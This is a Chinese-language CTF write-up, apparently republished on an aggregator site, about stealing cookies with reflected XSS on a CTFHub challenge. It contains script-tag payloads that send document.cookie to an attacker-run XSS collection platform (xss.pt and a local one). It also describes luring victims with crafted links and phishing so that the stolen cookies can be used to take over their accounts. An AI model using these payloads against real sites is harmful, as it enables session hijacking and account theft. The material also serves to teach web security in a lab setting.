IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> [ctfhub]-xss详解 -> 正文阅读

[网络协议][ctfhub]-xss详解

1、明确cookie的作用

当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。

2、XSS的目的

获取别人的cookie。
Web渗透测试之XSS攻击:反射型XSS

获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.cookie)< /script>,但cookie只会在受害用户的浏览器中弹出,我们无法获得。
??
那该怎么办呢?
①在存在XSS漏洞的地方加上XSS:<script src=“http://127.0.0.1/xss/UYxzH8?1608472710/” + document.cookie;> </script> (http://127.0.0.1/xss/UYxzH8?1608472710/ 为我们搭建的XSS平台)。

②接着构造虚假URL诱使受害用户点击:http://xxx/xx?abc=<script src=“http://127.0.0.1/xss/UYxzH8?1608472710/”+document.cookie;> </script>。就像上面那个蓝字链接,我诱使你们点击,然后你们的浏览器就会请求蓝字背后的链接。如果我把蓝字背后的链接换成http://xxx/xx?abc=<script src=“http://127.0.0.1/xss/UYxzH8?1608472710/”+document.cookie;> </script>,在你们点击后,你们的浏览器就会带上你们的cookie,访问http://127.0.0.1/xss/UYxzH8?1608472710/,从而在我所搭建的平台日志上留下你们的cookie。

③在用户点击后,只需查看我们所搭建平台的日志即可获得受害用户的cookie。在获得cookie之后就可以利用抓包工具修改请求包中的cookie,将其替换为受害用户的cookie即可登录受害用户的账号。而诱使用户点击虚假URL的方式有很多,如钓鱼邮件、特殊的图片或文本等。

3、题目

CTFHUB——反射型XSS详解
(1)随便测试一下,有回显。
在这里插入图片描述(2)测试一下有没有XSS漏洞
在这里插入图片描述(3)想让它弹cookie出来,不回显。emmm,即使回显,也是回显我们的cookie,没啥用。
在这里插入图片描述(4)搭建上面说的XSS平台(需要注册登录,然后新建一个项目,其他默认设置即可)
在这里插入图片描述(5)用户点击带有<sCRiPt sRC=//xss.pt/Rm8O></sCrIpT>的链接,就会访问//xss.pt/Rm8O,并在日志里面留下痕迹。
在这里插入图片描述
(6)这里的 send 相当于我们诱使别人点击了我们留下的链接。
在这里插入图片描述
(7)查看日志,找cookie
在这里插入图片描述

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-04-30 09:03:26  更:2022-04-30 09:03:28 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 3:41:15-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码